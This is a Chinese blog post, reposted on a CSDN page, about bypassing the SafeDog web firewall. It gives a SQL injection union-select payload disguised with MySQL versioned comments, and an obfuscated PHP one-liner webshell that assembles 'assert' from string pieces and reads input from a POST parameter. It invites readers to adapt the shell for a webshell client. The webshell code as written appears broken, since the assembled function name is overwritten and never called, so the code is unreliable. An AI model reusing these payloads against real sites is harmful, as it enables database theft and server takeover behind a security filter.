【原创】关于安全狗的注入绕过

本文分享了作者针对最新版安全狗的测试经验,详细介绍了如何通过特定语法绕过其SQL注入防护机制,并提供了一句话木马的示例用于绕开检测。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

0x01 测试狗的特性
安全狗一直我很早直前就想测试的,正好借这次机会。
本地搭建好环境
服务器:2003+apache+mysql+php+安全狗
到网上看了一下资料,了解了狗不是在进SQL进行检测的, 就是一个正则匹配,那就不难绕了。
写了个测试脚本,我们提交正常查询的时候安全狗就拦截了。

网上的方法好像都不行了,狗是最新版的了,更新在8号。

 

经过一天的测试,最后总结以下是狗不拦截的。
狗只拦截了联合select和一些常用的函数,那么OK
我们换成
/*!50000select/

  当时测试是发现能过狗但是mysql语句有错,最后测试如下:

Mysql是执行成功,我们用狗测试。

 

这里注意一下。User() 是被拦截的,换成cueernt_user狗是不拦截的。
最后绕过:
/*!50000union/*!*//*!50000select/*!*/1,2,3,4,current_user,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20

  

0x02  逃避狗的嗅觉。
关于大马这我也就不耗费精力去测试了,我们直接上一句话。
<?php
$mysql="a"."s"."s"."e"."r"." "."t";
$mysql1=str_replace(" ","","$mysql");
$mysql1=($_POST[90sec]);
?>

  

菜刀方面就大家自行动手了,如果改出来了记得发我一份。
哪位同学有好的思路,可以自由发挥。

转载于:https://www.cnblogs.com/blck/p/4904362.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值